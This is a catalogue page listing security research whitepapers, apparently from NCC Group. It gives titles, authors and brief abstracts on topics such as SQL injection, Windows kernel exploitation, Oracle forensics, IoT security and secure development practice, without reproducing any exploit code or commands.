Authored by: Brad Hill Download whitepaper
Common Flaws of Distributed Identity and Authentication Systems
Authored by: Brad Hill Download whitepaper
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Authored by: Jesse Burns Download whitepaper
Hunting SQL Injection Bugs
Also published on the Microsoft TechNet Library. Authored by: Brad Hill | Geng Yang Download whitepaper
IAX Voice Over-IP Security
Authored by: Himanshu Dwivedi | Zane Lackey Download whitepaper
ProxMon: Automating Web Application Penetration Testing
Authored by: Jonathan Wilkins Download whitepaper
Secure Application Development on Facebook
Authored by: Justine Osborne Download whitepaper
Secure Session Management With Cookies for Web Applications
Authored by: Chris Palmer Download whitepaper
Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
Authored by: Brad Hill Download Whitepaper
An Introduction to Authenticated Encryption
Authored by: Shawn Fitzgerald Download whitepaper
Browser Extension Password Managers
Authored by: Paul Youn | Marc Blanchou Download whitepaper
Introducing idb-Simplified Blackbox iOS App Pentesting
Authored by Daniel A. Mayer. ShmooCon 2014, January 17-19th, Washington, D.C. Download whitepaper
The factoring dead: Preparing for the cryptopocalypse
Authored by: Javed Samuel Download whitepaper
Analysis of Boomerang Differential Trails via a SAT-Based Constraint Solver URSA
Analysis of Boomerang Differential Trails via a SAT-Based Constraint Solver URSA Paper to be presented at ACNS 2015. Abstract Obtaining differential patterns over many rounds of a cryptographic primitive often requires working on local differential trail analysis. In the case of boomerang and rectangle attacks, merging two short differential trails into…
Internet of Things Security
Abstract The Internet of Things (IoT) is an emerging phenomenon where different kinds of devices that were previously not networked are being connected to networks. Examples include network connected thermostats, light bulbs, and door locks. These newly networked devices present additional attack surfaces, and due to the ad hoc nature of their implementations,…
Secure Messaging for Normal People
In this paper, Justin Engler discusses the challenges of secure messaging for normal people based on his presentation entitled “Secure Messaging” from DEF CON 23. “Secure” messaging programs and protocols continue to proliferate, and crypto experts can debate their minutiae, but there is very little information available to help the rest of…
Understanding and Hardening Linux Containers
Operating System virtualisation is an attractive feature for efficiency, speed and modern application deployment, amid questionable security. Recent advancements of the Linux kernel have coalesced for simple yet powerful OS virtualisation via Linux Containers, as implemented by LXC, Docker, and CoreOS Rkt among others. Recent container focused start-ups such as…
Private sector cyber resilience and the role of data diodes
Abstract: Governments and businesses recognise that absolute cyber security is neither possible nor practical. In the public sector the risks are in part addressed by the adoption of various compensating controls that align with various protective marking schemes. The nations which have adopted these controls have also developed resilience strategies, in…
General Data Protection Regulation – are you ready?
With the finalisation of the General Data Protection Regulation (GDPR) it is time for businesses to take stock and prepare for the requirements which will soon be imposed. The GDPR replaces the 1995 EU directive (Directive 95/46/EC) and begins a new chapter in European privacy. The regulation was published…
Business Insights: Cyber Security in the Financial Sector
Not only are cyber attacks becoming more frequent, they are also becoming more persistent, targeted and at times sophisticated, often causing widespread impact. While some boards and executives of financial services (FS) organisations are being urged to place cyber security at the top of their risk agenda, there still often…
The Importance of a Cryptographic Review
Cryptography is an underpinning of every organisation’s data security. It is as simple as the correct deployment of TLS and as complicated as bespoke protocols for software updates. This technology is an integral part of an organisation’s security infrastructure. With the field constantly evolving, having a dedicated review is becoming increasingly important. Download…
osquery Application Security Assessment Public Report
In an audit commissioned by Facebook, NCC Group consultants Raphael Salas, Andrew Rahimi and Robert Seacord assessed the osquery framework for operating system instrumentation. osquery represents operating system details and events as SQL tables that can be queried in real time in complex ways. The audit covered the osquery core and…
Abusing Privileged and Unprivileged Linux Containers
In this paper, we’ll discuss several security pitfalls with Linux containers. Many of them are intrinsic to the design of the container systems, or may be the result of insecure defaults. We’ll analyse historical container attacks, and how they are currently mitigated. We will then examine several novel or poorly…
A few notes on usefully exploiting libstagefright on Android 5.x
At NCC Group, a colleague and I recently spent some time trying to develop a more robust exploit for the Android libstagefright bug CVE-2015-3684. This is a bug that persisted through the patches Joshua Drake (jduck) originally provided to Google, so a few more firmware versions are vulnerable. In this…
eBook – Do you know how your organisation would react in a real-world attack scenario?
Do you know how your organisation would react in a real-world attack scenario? Find out where your weaknesses lie with a Red Team Assessment and take action now to improve your security posture. In today’s threat landscape, how to mitigate risk and prevent an organisation from becoming victim to a…
Erlang Security 101
This whitepaper is about Erlang Security. NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous different programming languages. Some are well understood from a security perspective (e.g. C, C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code reviews…
Threat Intelligence: Benefits for the Enterprise
Today we have released a new whitepaper titled: ‘Threat Intelligence: Benefits for the Enterprise’. This paper builds on a number of supporting blog posts we’ve published over the last seven months, namely: Understanding commercial sector threat intelligence and cyber security Threat intelligence: what we can learn from malware analysis Threat…
Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle
Static application security testing (SAST) is the analysis of computer software that is performed without the need to actually execute the program. The term is usually applied to analysis performed by an automated tool, whereas human analysis is typically called security-focused code review. The primary objective of SAST is to…
Secure Device Manufacturing: Supply Chain Security Resilience
Today the production of hardware devices involves multiple suppliers at various stages of the production and support lifecycle. There is no electronics manufacturer who manufactures every single component of a device in their own factory. As such, and as has been demonstrated, these hardware and manufacturing supply chains introduce risk that…
eBook – Planning a robust incident response process
Author: David Cannings This eBook is a simple workbook that walks you through some of the key takeaways to building your own incident response process in your organisation. It provides you with some insight into why a robust incident response plan is needed, the kinds of things that are at…
HDMI Ethernet Channel
HDMI is more than just a tool for displaying video, and with increasing numbers of new laptops and PCs using the function it is important for organisations to understand the potential security issues that are likely to arise as the protocols start to become more widely used. This paper will…
Advanced SQL Injection in SQL Server Applications
In this paper the author will explain, in detail, the common SQL injection technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. The paper will also cover the various ways in which SQL can be injected into the application and addresses some of the…
Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability
Until November 2013 (CVE-2013-3906), exploit primitives for Object Linking and Embedding (OLE) objects were not discussed publicly. This changed at BlackHat USA 2015, when Haifei Bing presented “Attacking Interoperability: An OLE Edition”. This talk examined the internals of OLE embedding. Over the past few months, several malware campaigns targeting high-profile…
Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817
By using just a few commonly available tools and a bit of time, it is possible to port the Misfortune Cookie exploit to exploit a TD-8817 V8 router running the latest firmware and gain reliable control over its web interface without crashing the router, even after repeated exploitation attempts. In…
Research Insights Volume 6: Common Issues with Environment Breakouts
Research Insights Volume 6: Common Issues with Environment Breakouts Due to the rising trend in organisations implementing bring your own device (BYOD) and remote access working, IT departments are facing the ongoing risks of securing devices they neither own nor control. This has led to a rise in the number…
Common Security Issues in Financially-Oriented Web Applications
A guideline for penetration testers to assess ecommerce and financial services applications. This document summarises NCC Group’s experience of assessing ecommerce and financial services applications, providing a checklist of common security issues seen in financial services web applications. In NCC Group’s experience, one of the best ways to identify the…
Research Insights Volume 3 – How are we breaking in: Mobile Security
The proliferation of the personal and business use of mobile devices has created a strong demand for mobile security assurance. Mobile apps and devices can suffer from many of the same vulnerabilities as traditional systems but also require new approaches to security testing and risk assessment. This white paper looks to highlight some of…
Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
tl;dr In June 2015, Microsoft released the MS15-061 advisory to address a number of vulnerabilities. Today we’ve released a detailed analysis of one of these vulnerabilities, in the win32k.sys driver, and documented the necessary details for exploiting this class of vulnerability on Microsoft Windows 7 Service Pack 1. This is…
Password and brute-force mitigation policies
The @NCCGroupInfosec team performs security assessments across many different sectors and technologies. Regardless of the system being assessed, one of the most common issues we identify pertains to the use of weak passwords – permitted by an inadequate password policy. Systems that do not enforce a strong password policy can…
Understanding Ransomware: Impact, Evolution and Defensive Strategies
This whitepaper, produced by our Cyber Defence Operations team, is about understanding ransomware. It examines the impact, evolution and defensive strategies that can be employed by organisations. It is primarily focused on Microsoft Windows due to the historic prevalence and devastating impact of ransomware on this platform, but…
Writing Small Shellcode
When exploiting vulnerabilities in compiled software we are often constrained by the amount of data that can be used, therefore it is important that shellcode is as small as possible. In this paper the author will describe his attempt to write Win32 shellcode that is as small as possible, in…
Writing Secure ASP Scripts
This paper will address some of the common classes of coding error that can be encountered when auditing web applications running on the Active Server Pages (ASP) platform. Firstly the paper will provide a list of common coding problems to be discussed, followed by a discussion of the three main…
Windows 2000 Format String Vulnerabilities
This paper, by David Litchfield, discusses format string vulnerabilities on the Windows 2000 operating system. Download Whitepaper
The Pentesters Guide to Akamai
This paper summarises the findings of NCC Group’s research into Akamai and provides advice to companies that wish to gain maximum security from Akamai’s solutions on how to achieve this. Akamai allows organisations to improve performance and decrease the load on a web-based service through distributed networks of servers to perform…
Modelling Threat Actor Phishing Behaviour
Modelling Threat Actor Phishing Behaviour – “you’re only as strong as your weakest link!” This whitepaper focuses on the reconnaissance phase of a simulated attack. It will discuss how likely targets are identified within an organisation and why certain individuals are chosen. The reconnaissance phase will typically involve open source intelligence…
Research Insights Volume 7: Exploitation Advancements
Research Insights Volume 7: Exploitation Advancements In the next of the Research Insights series we have looked at the exploitation techniques used by cyber criminals in their attempt to gain access to your critical business information. As exploits become more sophisticated, attacks of the previous era are now no longer…
Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug on both 32-bit and 64-bit
tl;dr Earlier this year I worked on an exploit for an interesting use-after-free vulnerability in win32k.sys (CVE-2015-0057) and was able to develop a reliable exploit on both 32-bit and 64-bit, affecting XP through Windows 8.1 (with a few exceptions). This writeup describes in detail how I approached exploitation on both…
The Demise of Signature Based Antivirus
There has been some debate on the importance of antivirus software over the past few years. Some see antivirus as a way to satisfy risk controls and form part of an organisation’s information security strategy, and insist on antivirus being installed on all of an organisation’s machines. However, this demand for antivirus has…
Stopping Automated Attack Tools
There are a huge number of automated attack tools available that can spider and mirror application content, extract confidential material, discover code injection flaws, fuzz application variables for exploitable overflows, scan for common files or vulnerable CGIs and generally attack or exploit web-based application flaws. These tools are very useful…
Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond
This white paper outlines a set of practical and pragmatic security considerations for organisations designing, developing and testing Internet of Things (IoT) devices and solutions. The purpose of this white paper is to provide practical advice for consideration as part of the product development lifecycle. While IoT products by their…
Security Best Practice: Host Naming & URL Conventions
This paper will demonstrate how the implementation of a well thought-out host naming and URL referencing convention can provide a sizable contribution to an organisation’s defence-in-depth posture. Host and URL naming conventions are an issue that is often overlooked by organisations when they are developing web applications, but poorly…
Securing PL/SQL Applications with DBMS_ASSERT
Over the past few years Oracle has fixed a large number of PL/SQL injection vulnerabilities in their database server product. To help combat this class of attack Oracle has introduced the DBMS_ASSERT PL/SQL package. As a security researcher, it is excellent to see Oracle finally making the right positive moves…
Second-Order Code Injection Attacks
A second-order code injection attack is the process where malicious code is injected into a web-based application and not immediately executed but is stored by the application to be retrieved, rendered and executed by the victim later. In this paper we will further explain second-order code injection attacks, providing examples…
Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013
Embedded systems have become a part of our day to day lives and examples of these can be seen everywhere from TVs to aircraft, printers to weapon control systems, but as a security researcher it is often difficult to know how to begin when testing one of these black boxes.…
Research Insights Volume 4 – Sector Focus: Maritime Sector
The fourth edition of our ‘Research Insights’ series delves into the risks faced in the Maritime Industry as a result of the increasingly connected world that we live in. Cyber security weaknesses in the maritime industry include insufficiently maintained and protected software, problems with legacy communication systems and the widespread…
Research Insights Volume 2 – Defensive Trends
This paper is the second in a series of Research Insights from our world class research team. It looks at some of the most recent trends in information security defence, such as cloud computing, mobile apps, mobile devices and security information management systems. Download whitepaper The next in the series…
Research Insights Volume 1 – Sector Focus: Financial Services
This whitepaper forms the first in a series of research insights from NCC Group. It delves into the financial services sector to provide an overview of some of the threats the sector is currently facing. This is a series of papers from NCC Group, the next two papers in the…
Quantum Cryptography – A Study Into Present Technologies and Future Applications
The first quantum cryptographic exchange occurred in October 1989 at IBM’s Thomas J. Watson Research Centre near New York. Two computers called Alice and Bob successfully negotiated a completely secure channel of communication over a distance of 32 centimetres, making quantum cryptography a reality rather than just a theory. In…
Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
This whitepaper is about PCI DSS v3.0 Requirement 3.4 – the requirement to protect cardholder data on disk/at rest. There are a number of compliant options available, with varying levels of security in different scenarios. This document is intended as an analysis of the various compliant options such that the…
Preparing for Cyber Battleships – Electronic Chart Display and Information System Security
In an increasingly connected world, cyber security is more important than ever. NCC Group, one of the world’s leading cyber security research companies, regularly investigates the susceptibility of non-traditional systems to attack in order to help raise awareness of the risks to these systems. In this paper, we discuss the…
Passive Information Gathering – The Analysis of Leaked Network Security Information
Most organisations are aware of and are protecting themselves against the threat posed by an attacker gaining access to systems through the exploitation of security vulnerabilities within the organisation’s systems. However, the potential threat that information unintentionally leaked and freely available over the internet can pose to an organisation is often overlooked. This…
Oracle Passwords and OraBrute
This paper will discuss the weakness of Oracle passwords and how they are implemented, with reference to a number of current security issues. Lastly, this paper will introduce a tool to exploit this weakness in Oracle’s most privileged account. Download whitepaper
Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations
This paper is the final in a series of papers exploring Oracle forensics by David Litchfield. In this paper David will be examining the internals of the Oracle System Change Number (SCN) in 10g and show how it can be useful in forensic investigations. The paper will also show how orablock and…
Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin
This paper is the 6th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. This paper will look at the ways a forensics examiner can search for evidence of an attack in the places and technologies designed by Oracle for disaster recovery processes. Download whitepaper
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing
This paper is the 5th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment, David discusses forensic analysis of a compromised database server. When investigating other areas of computer forensics it is often obvious that a crime has been committed; however…
Oracle Forensics Part 4: Live Response
This paper is the 4th in a series of papers covering Oracle forensics. In this paper, David Litchfield covers how to react when a security incident occurs. For many organisations without a plan of action in the event of a security incident, the instinctive response is to disconnect the system from the network…
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism
This paper is the 3rd in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment David will be looking at ways to understand if a breach has been successful. The paper will start by exploring attacks against the authentication mechanism and evidence from the…
Oracle Forensics Part 2: Locating Dropped Objects
This second paper in the Oracle Forensics series will show that, even when an object has been dropped and purged from the system, there will be, in the vast majority of cases, fragments left “lying around” which can be sewn together to build an accurate picture of what the actions the…
Oracle Forensics Part 1: Dissecting the Redo Logs
This paper is the 1st in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this 1st paper David will explain how the redo logs can be a rich source of evidence for a forensic examiner when they are investigating a compromised Oracle database server. Whenever a…
Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP
As the number of products providing protection against stack-based buffer overflow exploits increases, non-stack-based overflow exploits will become more and more common. In this paper we will start by explaining the differences between a stack-based overflow and a non-stack-based overflow, then explain how to write a…
New Attack Vectors and a Vulnerability Dissection of MS03-007
On the 17th of March 2003 Microsoft announced a patch to fix a security vulnerability at the centre of the Windows 2000 operating system. In this paper we will discuss a number of new attack vectors that we have discovered on the same operating system, including Java-based web servers…
More Advanced SQL Injection
This paper covers topics from the author’s previous paper “Advanced SQL Injection”, expanding upon and clarifying ideas from the previous paper. It will describe a method for privilege escalation using the openrowset function to scan a network, a method for extracting information in the absence of an error message and…
Microsoft’s SQL Server vs. Oracle’s RDBMS
This paper explores the security postures of Microsoft’s SQL Server and Oracle’s RDBMS and examines the differences between the two systems based upon flaws reported by external security researchers. Download whitepaper
Microsoft SQL Server Passwords
It is widely known that SQL Server uses an undocumented function, pwdencrypt(), to produce a hash of the user’s password, which is stored in the sysxlogins table of the master database. However, what has not been discussed are the details of the pwdencrypt() function. This paper will cover the pwdencrypt function…
Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
Due to their relatively low cost, small size and ease of distribution, smart cards have become a popular choice for security when designing a system. They are often regarded as tamper-proof devices where data can be physically protected, but this is not the case and it should be remembered…
Lessons learned from 50 bugs: Common USB driver vulnerabilities
Over the past few years NCC Group has identified over 50 USB driver bugs. Using this research, along with information from his 2011 paper “USB – Undermining Security Barriers”, Andy Davis outlines in this paper common USB vulnerabilities and how to identify them. The paper will firstly discuss the…
Inter-Protocol Exploitation
Inter-Protocol Exploitation is an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a different application which uses a different protocol entirely. This paper will expand upon previous research into Inter-Protocol Exploitation and will show the…
Inter-Protocol Communication
Research into web browser security has acted as a catalyst for more in-depth research into Inter-Protocol Communication, an attack vector that potentially allows arbitrary protocols to meaningfully interact with each other. In the past, it has been assumed that communication between different protocols is invalid and of no consequence; this paper will…
Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities
Over the past few years there has been a shift in the pattern of security vulnerabilities and an increase in the volume of zero-day (0day) exploits, which is making traditional security strategies less effective. Although traditional techniques such as penetration testing and vulnerability scanning are still an essential part of a company’s security…
Implementing and Detecting a PCI Rootkit
This paper will build upon the author’s previous research presented in February 2006 that explored a way of persisting a rootkit in the system BIOS via the Advanced Configuration and Power Interface (ACPI). This paper will discuss means of persisting a rootkit on a PCI device containing a flashable expansion…
How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit
Penetration test reports commonly contain mention of vulnerabilities in SSL/TLS (hereafter referred to as just SSL). In many cases, this is due to system administrators not understanding the details of these services’ configuration and assuming that simply using SSL provides security. The issues identified during penetration tests are usually low…
Hackproofing Oracle Application Server
Although Oracle 9 was proven not to be Unbreakable as their marketing campaign claimed, the product had passed fourteen independent security evaluations, demonstrating Oracle’s commitment to producing a secure product. In this paper we aim to bring Oracle customers to the secure environment they were promised by examining the ways…
Hackproofing MySQL
MySQL is one of the most popular open source databases, and compared to some database management systems it is relatively easy to configure. However, there are still a wide variety of configuration issues that need to be addressed to ensure the system is secure. This paper will provide an outline…
Hackproofing Lotus Domino Web Server
This paper will show Lotus Domino administrators ways in which an attacker would attempt to subvert the security of a Domino web server and provide insight into the mind of a Domino hacker. Throughout the paper the attacks will be explained in detail and will include information on how to…
Hacking Appliances: Ironic exploits in security products
The paper will review research conducted in 2012 into the overall security posture of popular appliance-based security products, building on research carried out in 2011 by NCC Group. The research focused on the most recent versions of widely used appliances from popular vendors in the IT Security industry covering: Firewalls…
Fuzzing USB devices using Frisbee Lite
This paper will discuss the format of device requests that are sent to USB devices in order to hopefully provide an insight into areas where software flaws may exist. It will also discuss a number of public vulnerabilities in USB devices and finally, the installation and usage of Frisbee Lite.…
HDMI – Hacking Displays Made Interesting
Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…
Exploiting Security Gateways Via Web Interfaces
The security of security software is often taken for granted, and people assume that as it has been developed by a company that knows security it is likely to be secure. However, with regard to Security Gateway UIs this is an incorrect assumption: the developers who design, code and test the UI…
Research Insights Volume 5 – Sector Focus: Automotive
The modern vehicle has become increasingly computerised, and with that has come an increased risk of cyber threats. While it has been known for some time in the vehicle modification and security industries that electronic vehicle systems contain exploitable vulnerabilities, it is only recently that academics, government, vehicle manufacturers, and the cyber security research community…
The why behind web application penetration test prerequisites
Before a web application penetration test is scheduled to start, the company performing the test will contact the client with a set of prerequisites; that is, a list of considerations and configurations that are required before the test can begin. However, the…
Blackbox iOS App Assessments Using idb
Daniel Mayer. Presented at Black Hat Mobile Security Summit, 2015. Abstract: More than ever, mobile apps are used to manage and store sensitive data by both corporations and individuals. In this paper, we review common iOS mobile app flaws involving data storage, inter-process communication,…
Cyber red-teaming business-critical systems while managing operational risk
Cyber red-teaming allows mature organisations to gauge their true resilience to sophisticated, planned, and somewhat sustained cyber-attack. These organisations use red team engagements to assess multiple facets of their cyber security strategy, maturity and implementation. With the introduction of programmes such as…
Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
In this paper, Daniel Mayer and Drew Suarez discuss the challenges mobile app developers face in securing data stored on devices including mobility, accessibility, and usability requirements. Given these challenges, we first debunk common misconceptions about full-disk encryption and show why it is not sufficient for many attack scenarios. We then systematically introduce the more…
USB attacks need physical access right? Not any more…
Historically, USB bugs have required physical access so that a rogue device can be inserted into the target system to trigger a vulnerability by supplying malicious data, often within a USB protocol descriptor. This paper provides step-by-step instructions showing how to remotely trigger a Windows-based USB bug by using a…
Threat Profiling Microsoft SQL Server
In this paper we will write from the perspective of an attacker targeting the Microsoft SQL Server. The paper will cover: setting up for an attack; attacks that do not require authentication; and attacks that require authentication.
Thin Clients: Slim Security
The advent of thin client, diskless PCs appears to offer IT Managers a cheap and effective solution to the problem of managing a large estate of desktop PCs and the associated security risks, making thin clients an attractive solution. However, research for this paper has revealed that these devices can…
The Phishing Guide: Understanding & Preventing Phishing Attacks
Phishing started off as part of popular hacking culture, but professional criminals quickly began using phishing techniques to steal personal finances and conduct identity theft at a global level. As phishing attacks become more widespread and more sophisticated, it is important that we understand the tools and techniques used. This…
Bypassing Oracle DBMS_ASSERT (in certain situations)
Oracle Security Specialist Alex Kornbrust demonstrated that there are certain cases where the DBMS_ASSERT.QUALIFIED_SQL_NAME function can be unintentionally misused by developers so that SQL injection is still possible, and showed a way to break out of a quoted string to inject arbitrary SQL. This paper will explore another…
Assuring Your DDoS Defences
Distributed Denial of Service (DDoS) attacks first appeared on the internet in 2000; since then they have increased in frequency and size and become a serious threat to an organisation’s security. During a DDoS attack, thousands of botnets will flood an organisation’s servers with more requests than they can handle,…
Black Hat Europe 2013 Andy Davis: To dock or not to dock…
This paper will explore the issue of laptop docking stations being used as attack platforms as well as explaining a few simple techniques that can be used to mitigate the risks. Laptop docking stations are attractive to organisations with semi-mobile workers as they enable users to connect their laptops to…
BlackBerry PlayBook Security – Part Two – BlackBerry Bridge
This paper is the second in a series discussing the security of the BlackBerry PlayBook, and will focus on the security of the BlackBerry Bridge. The BlackBerry Bridge allows its users to connect their PlayBook to the BlackBerry phone and use applications on the tablet through the phone and for…
BlackBerry PlayBook Security – Part One
This paper forms the first in a series of papers on the security of the first tablet device from Research in Motion (RIM), the BlackBerry PlayBook. This paper aims to give an overview of the security of the BlackBerry PlayBook; a breadth-first approach was taken to uncover as many…
Automated enumeration of email filtering solutions
This whitepaper summarises research undertaken in 2013/14 to develop offensive reconnaissance techniques for automated and external enumeration of the email filtering solutions of target organisations. It shows how methodology, automated scripts, and test message sets can be used to enumerate a target email filtering solution, quickly and to a high…
Attacking the Windows Kernel (Black Hat Las Vegas 2007)
This paper is focused on Windows and the Intel Architecture, and will briefly outline the supervisor boundaries currently provided. Different attack vectors, along with relevant examples, will be provided to demonstrate how to attack the supervisor from the perspective of the supervised.
Assessing IIS Configuration Remotely
A good application security assessment should probe all levels of the environment as well as the custom application itself. In this paper we will examine the relatively unknown skills of assessing the in-depth configuration of a Microsoft IIS web server remotely, and we hope that we will also show the…
A Simple and Practical Approach to Input Validation
Input validation is the process of ensuring that the input into software conforms to what the internal logic of the software expects. Though it is a relatively simple problem to solve, it accounts for a high proportion of the security vulnerabilities discovered. Not only is more education needed on the security risks…
Application Layer Attacks – The New DDoS Battleground
DDoS attacks have been on the rise for a number of years, which has resulted in significant increases in the variety and availability of mitigation services designed to deal with such threats. With advancements in attack techniques comes the requirement for mitigation providers to adapt their detection and scrubbing methodologies. We…
Anti Brute Force Resource Metering
Web-based applications’ authentication processes are commonly vulnerable to automated brute force guessing attacks. Techniques such as escalating time delays and minimum lockout strategies are commonly implemented to solve the problem; however, in reality these techniques are not effective. This paper will explore an alternative solution, the enforcement of resource metering…
An Introduction to Heap overflows on AIX 5.3L
This paper, by David Litchfield, provides an introduction to heap overflows on AIX 5.3L.